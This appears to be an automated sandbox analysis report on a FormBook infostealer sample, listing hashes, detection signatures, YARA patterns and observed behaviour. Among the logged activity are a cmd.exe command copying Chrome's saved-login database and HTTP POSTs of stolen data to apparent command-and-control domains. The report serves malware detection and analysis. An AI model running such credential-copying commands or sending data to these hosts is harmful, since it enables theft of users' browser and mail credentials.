
Analysis Report bXdiOPDmyZ.exe

Overview

General Information

Sample Name: bXdiOPDmyZ.exe
MD5: c50f6a19b90539cf83a0637f739982f9
SHA1: 51b1635e0e1e2ff1d150958ef27fa80b5ffb5bb2
SHA256: c0f5f94b8f695e7c5a4b6884ff1a122a2122ae1ed4e2a28a8c5470bbe957fa5a

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Antivirus detection for sample
Benign windows process drops PE files
Detected FormBook malware
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Steal Google chrome login data
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Yara detected Generic Dropper
Creates autostart registry keys with suspicious names
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to resolve many domain names, but no domain seems valid
Tries to steal Mail credentials (via file access)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query network adapter information
Contains functionality to read the PEB
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches the installation path of Mozilla Firefox
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000002.00000002.1135356975.0000000003E54000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000002.00000002.1135356975.0000000003E54000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x1597b: $sqlite3step: 68 34 1C 7B E1
  • 0x15a8e: $sqlite3step: 68 34 1C 7B E1
  • 0x159aa: $sqlite3text: 68 38 2A 90 C5
  • 0x15acf: $sqlite3text: 68 38 2A 90 C5
  • 0x159bd: $sqlite3blob: 68 53 D8 7F 8C
  • 0x15ae5: $sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.1135356975.0000000003E54000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x740a: $sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7674: $sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x12cf7: $sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x127e3: $sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x12df9: $sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x12f71: $sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x81ec: $sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x11a5e: $sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x8b85: $sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18069: $sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1906c: $sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000013.00000002.1553095151.00000000003A0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000013.00000002.1553095151.00000000003A0000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x157b9: $sqlite3step: 68 34 1C 7B E1
  • 0x158cc: $sqlite3step: 68 34 1C 7B E1
  • 0x157e8: $sqlite3text: 68 38 2A 90 C5
  • 0x1590d: $sqlite3text: 68 38 2A 90 C5
  • 0x157fb: $sqlite3blob: 68 53 D8 7F 8C
  • 0x15923: $sqlite3blob: 68 53 D8 7F 8C

Unpacked PEs

Source | Rule | Description | Author | Strings
2.2.bXdiOPDmyZ.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
2.2.bXdiOPDmyZ.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x149b9: $sqlite3step: 68 34 1C 7B E1
  • 0x14acc: $sqlite3step: 68 34 1C 7B E1
  • 0x149e8: $sqlite3text: 68 38 2A 90 C5
  • 0x14b0d: $sqlite3text: 68 38 2A 90 C5
  • 0x149fb: $sqlite3blob: 68 53 D8 7F 8C
  • 0x14b23: $sqlite3blob: 68 53 D8 7F 8C
2.2.bXdiOPDmyZ.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x6448: $sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x66b2: $sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x11d35: $sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x11821: $sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x11e37: $sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x11faf: $sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x722a: $sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x10a9c: $sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x7bc3: $sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x170a7: $sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x180aa: $sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
18.2.ntbhcfw6lm.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
18.2.ntbhcfw6lm.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x149b9: $sqlite3step: 68 34 1C 7B E1
  • 0x14acc: $sqlite3step: 68 34 1C 7B E1
  • 0x149e8: $sqlite3text: 68 38 2A 90 C5
  • 0x14b0d: $sqlite3text: 68 38 2A 90 C5
  • 0x149fb: $sqlite3blob: 68 53 D8 7F 8C
  • 0x14b23: $sqlite3blob: 68 53 D8 7F 8C

Sigma Overview

System Summary:

Sigma detected: Steal Google chrome login data
Source: Process started | Author: Joe Security | Data: Command: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\cmmon32.exe, ParentImage: C:\Windows\SysWOW64\cmmon32.exe, ParentProcessId: 4976, ProcessCommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, ProcessId: 1800

Signature Overview


AV Detection:

Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Dzhld\ntbhcfw6lm.exe | Avira: detection malicious, Label: TR/Kryptik.zfyes
Antivirus detection for sample
Source: bXdiOPDmyZ.exe | Avira: detection malicious, Label: TR/Kryptik.zfyes
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Dzhld\ntbhcfw6lm.exe | Virustotal: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\Dzhld\ntbhcfw6lm.exe | Metadefender: Detection: 32%
Source: C:\Users\user\AppData\Local\Temp\Dzhld\ntbhcfw6lm.exe | ReversingLabs: Detection: 86%
Multi AV Scanner detection for submitted file
Source: bXdiOPDmyZ.exe | Virustotal: Detection: 75%
Source: bXdiOPDmyZ.exe | Metadefender: Detection: 32%
Source: bXdiOPDmyZ.exe | ReversingLabs: Detection: 86%
Yara detected FormBook
Source: Yara match | File source: 00000002.00000002.1135356975.0000000003E54000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.1553095151.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.1553595966.0000000003F04000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.1549846475.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2701515168.00000000006D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.1552830718.0000000002CE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1132089872.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2701977232.0000000000940000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1134592237.0000000002AF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.1550979409.0000000002240000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1133021298.00000000020C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 2.2.bXdiOPDmyZ.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 18.2.ntbhcfw6lm.exe.400000.0.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Dzhld\ntbhcfw6lm.exe | Joe Sandbox ML: detected
Machine Learning detection for sample
Source: bXdiOPDmyZ.exe | Joe Sandbox ML: detected
Source: 17.0.ntbhcfw6lm.exe.400000.0.unpack | Avira: Label: TR/Kryptik.zfyes
Source: 2.2.bXdiOPDmyZ.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 18.0.ntbhcfw6lm.exe.400000.0.unpack | Avira: Label: TR/Kryptik.zfyes
Source: 0.0.bXdiOPDmyZ.exe.400000.0.unpack | Avira: Label: TR/Kryptik.zfyes
Source: 2.0.bXdiOPDmyZ.exe.400000.0.unpack | Avira: Label: TR/Kryptik.zfyes
Source: 18.2.ntbhcfw6lm.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen

Source: C:\Users\user\Desktop\bXdiOPDmyZ.exe | Code function: 4x nop then pop edi | 2_2_004140CD
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 4x nop then pop edi | 4_2_009540C4
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 4x nop then pop edi | 19_2_003B40CD

Networking:

Tries to resolve many domain names, but no domain seems valid
Source: unknown | DNS traffic detected: query: www.rosedarte.com replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: www.vogahnews.com replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: www.happyhage.com replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: www.diffcomplex.net replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: www.ugrejr.win replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: www.xn--fiqw6ol9bis7g.com replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: www.etoufu.com replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: www.hongsemall.com replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: www.angelika-dorn.com replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: www.bbbav62621.com replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: www.xylemco.com replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: www.sewamobildanbus.com replaycode: Name error (3)
Source: global traffic | HTTP traffic detected: GET /sh/?ers=Ml54sjKpKXO8nzrP&8pFL=5GGoshPm8DtXJbtv0j0CpM0ZScDouSGJSOqUOJNMNiXSV7FSaO+82pviX4ynrFwNCgG8 HTTP/1.1 Host: www.abblaster.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /sh/?ers=Ml54sjKpKXO8nzrP&8pFL=jmVQmi4sjS7ih7V2IoNMh1SkeFqY0dJymV2JACzQPE/qHepWmAmodPcElCzP+DKsrkIQ HTTP/1.1 Host: www.poyik.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /sh/?8pFL=LUR8/txceBDtIKNXLiQMutYOIYoLpa/yZvZq3kQ0sBAXqAM4bNfHWEKMD4Yt5BclzbK7&ers=Ml54sjKpKXO8nzrP HTTP/1.1 Host: www.zabierzowska.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /sh/?8pFL=oCU8qkR86wHM4cE0Nkw8zeB5R9pLzrdrR6drjm45vOC9QNVBuIjVP0TQIAKENpCxedHo&ers=Ml54sjKpKXO8nzrP HTTP/1.1 Host: www.worldinnovativesolutions.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: Joe Sandbox View | IP Address: 198.185.159.144 198.185.159.144
Source: Joe Sandbox View | ASN Name: unknown unknown
Source: global traffic | HTTP traffic detected: POST /sh/ HTTP/1.1 Host: www.poyik.com Connection: close Content-Length: 410 Cache-Control: no-cache Origin: http://www.poyik.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.poyik.com/sh/ Accept-Language: en-US Accept-Encoding: gzip, deflate
Source: global traffic | HTTP traffic detected: POST /sh/ HTTP/1.1 Host: www.poyik.com Connection: close Content-Length: 141254 Cache-Control: no-cache Origin: http://www.poyik.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.poyik.com/sh/ Accept-Language: en-US Accept-Encoding: gzip, deflate
Source: global traffic | HTTP traffic detected: POST /sh/ HTTP/1.1 Host: www.zabierzowska.com Connection: close Content-Length: 410 Cache-Control: no-cache Origin: http://www.zabierzowska.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.zabierzowska.com/sh/ Accept-Language: en-US Accept-Encoding: gzip, deflate
Source: global traffic | HTTP traffic detected: POST /sh/ HTTP/1.1 Host: www.zabierzowska.com Connection: close Content-Length: 141254 Cache-Control: no-cache Origin: http://www.zabierzowska.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.zabierzowska.com/sh/ Accept-Language: en-US Accept-Encoding: gzip, deflate
Source: global traffic | HTTP traffic detected: POST /sh/ HTTP/1.1 Host: www.worldinnovativesolutions.com Connection: close Content-Length: 410 Cache-Control: no-cache Origin: http://www.worldinnovativesolutions.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.worldinnovativesolutions.com/sh/ Accept-Language: en-US Accept-Encoding: gzip, deflate
Source: global traffic | HTTP traffic detected: POST /sh/ HTTP/1.1 Host: www.worldinnovativesolutions.com Connection: close Content-Length: 141254 Cache-Control: no-cache Origin: http://www.worldinnovativesolutions.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.worldinnovativesolutions.com/sh/ Accept-Language: en-US Accept-Encoding: gzip, deflate
Source: unknown | DNS traffic detected: queries for: www.ugrejr.win
Source: unknown | HTTP traffic detected: POST /sh/ HTTP/1.1 Host: www.poyik.com Connection: close Content-Length: 410 Cache-Control: no-cache Origin: http://www.poyik.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.poyik.com/sh/ Accept-Language: en-US Accept-Encoding: gzip, deflate
          Source: explorer.exe, 00000003.00000000.1113021283.000000000B2B6000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000003.00000000.1096451624.0000000003230000.00000004.00000001.sdmpString found in binary or memory: http://ns.microsoftom/photo/1.2/tD
          Source: cmmon32.exe, 00000004.00000002.2701122900.00000000001C8000.00000004.00000020.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eas/sc/2b/a5ea21.ico=c
          Source: explorer.exe, 00000003.00000002.2705151023.00000000030D0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000003.00000000.1113021283.000000000B2B6000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000003.00000000.1113021283.000000000B2B6000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000003.00000000.1113021283.000000000B2B6000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000003.00000000.1113021283.000000000B2B6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000003.00000000.1113021283.000000000B2B6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000003.00000000.1113021283.000000000B2B6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000003.00000000.1113021283.000000000B2B6000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000003.00000000.1113021283.000000000B2B6000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: cmmon32.exe, 00000004.00000002.2701122900.00000000001C8000.00000004.00000020.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehp
          Source: cmmon32.exe, 00000004.00000002.2701122900.00000000001C8000.00000004.00000020.sdmpString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp%
          Source: cmmon32.exe, 00000004.00000002.2701122900.00000000001C8000.00000004.00000020.sdmpString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehpG
          Source: cmmon32.exe, 00000004.00000002.2701122900.00000000001C8000.00000004.00000020.sdmpString found in binary or memory: http://www.msn.com/de-ch/ocid=iehp
          Source: cmmon32.exe, 00000004.00000002.2701122900.00000000001C8000.00000004.00000020.sdmpString found in binary or memory: http://www.msn.com/ocid=iehpk
          Source: explorer.exe, 00000003.00000000.1113021283.000000000B2B6000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000003.00000000.1113021283.000000000B2B6000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000003.00000000.1113021283.000000000B2B6000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000003.00000000.1113021283.000000000B2B6000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000003.00000000.1113021283.000000000B2B6000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: cmmon32.exe, 00000004.00000002.2706016664.0000000004A59000.00000004.00000001.sdmpString found in binary or memory: http://www.worldinnovativesolutions.com
          Source: cmmon32.exe, 00000004.00000002.2706016664.0000000004A59000.00000004.00000001.sdmpString found in binary or memory: http://www.worldinnovativesolutions.com/sh/
          Source: explorer.exe, 00000003.00000000.1113021283.000000000B2B6000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: cmmon32.exe, 00000004.00000002.2706167615.0000000004D4F000.00000004.00000001.sdmpString found in binary or memory: https://wis-consultancy.com/sh/?8pFL=oCU8qkR86wHM4cE0Nkw8zeB5R9pLzrdrR6drjm45vOC9QNVBuIjVP0TQIAKENpC
          Source: cmmon32.exe, 00000004.00000002.2701122900.00000000001C8000.00000004.00000020.sdmpString found in binary or memory: https://www.msn.com/spartan/ientplocale=en-US&market=US&enableregulatorypsm=0&enablecpsm=0&NTLogo=1&

          Source: bXdiOPDmyZ.exe, 00000000.00000002.1091450755.000000000061A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara matchFile source: 00000002.00000002.1135356975.0000000003E54000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.1553095151.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.1553595966.0000000003F04000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.1549846475.0000000000401000.00000020.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2701515168.00000000006D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.1552830718.0000000002CE0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1132089872.0000000000401000.00000020.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2701977232.0000000000940000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1134592237.0000000002AF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.1550979409.0000000002240000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1133021298.00000000020C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.bXdiOPDmyZ.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.ntbhcfw6lm.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          Detected FormBook malware
          Source: C:\Windows\SysWOW64\cmmon32.exeDropped file: C:\Users\user\AppData\Roaming\O-979P0E\O-9logri.ini
          Source: C:\Windows\SysWOW64\cmmon32.exeDropped file: C:\Users\user\AppData\Roaming\O-979P0E\O-9logrf.ini
          Source: C:\Windows\SysWOW64\cmmon32.exeDropped file: C:\Users\user\AppData\Roaming\O-979P0E\O-9logrv.ini
          Malicious sample detected (through community Yara rule)
          Source: 00000002.00000002.1135356975.0000000003E54000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.1135356975.0000000003E54000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000013.00000002.1553095151.00000000003A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000013.00000002.1553095151.00000000003A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2705696143.00000000048DF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
          Source: 00000012.00000002.1553595966.0000000003F04000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000012.00000002.1553595966.0000000003F04000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000012.00000002.1549846475.0000000000401000.00000020.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000012.00000002.1549846475.0000000000401000.00000020.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2701515168.00000000006D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.2701515168.00000000006D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000012.00000002.1552830718.0000000002CE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000012.00000002.1552830718.0000000002CE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.1132089872.0000000000401000.00000020.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.1132089872.0000000000401000.00000020.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2701977232.0000000000940000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.2701977232.0000000000940000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.1134592237.0000000002AF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.1134592237.0000000002AF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000012.00000002.1550979409.0000000002240000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000012.00000002.1550979409.0000000002240000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.1133021298.00000000020C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.1133021298.00000000020C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.bXdiOPDmyZ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.bXdiOPDmyZ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 18.2.ntbhcfw6lm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 18.2.ntbhcfw6lm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 0_2_03D51CF1 NtProtectVirtualMemory,0_2_03D51CF1
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_00416BC0 NtCreateFile,2_2_00416BC0
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_00416C70 NtReadFile,2_2_00416C70
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_00416CF0 NtClose,2_2_00416CF0
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_00416DA0 NtAllocateVirtualMemory,2_2_00416DA0
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_00416BBB NtCreateFile,2_2_00416BBB
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201BA240 NtReadFile,LdrInitializeThunk,2_2_201BA240
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201BA2D0 NtClose,LdrInitializeThunk,2_2_201BA2D0
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201BA360 NtAllocateVirtualMemory,LdrInitializeThunk,2_2_201BA360
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201BA3E0 NtFreeVirtualMemory,LdrInitializeThunk,2_2_201BA3E0
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201BA410 NtQueryInformationToken,LdrInitializeThunk,2_2_201BA410
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201BA480 NtMapViewOfSection,LdrInitializeThunk,2_2_201BA480
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201BA4A0 NtUnmapViewOfSection,LdrInitializeThunk,2_2_201BA4A0
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201BA540 NtDelayExecution,LdrInitializeThunk,2_2_201BA540
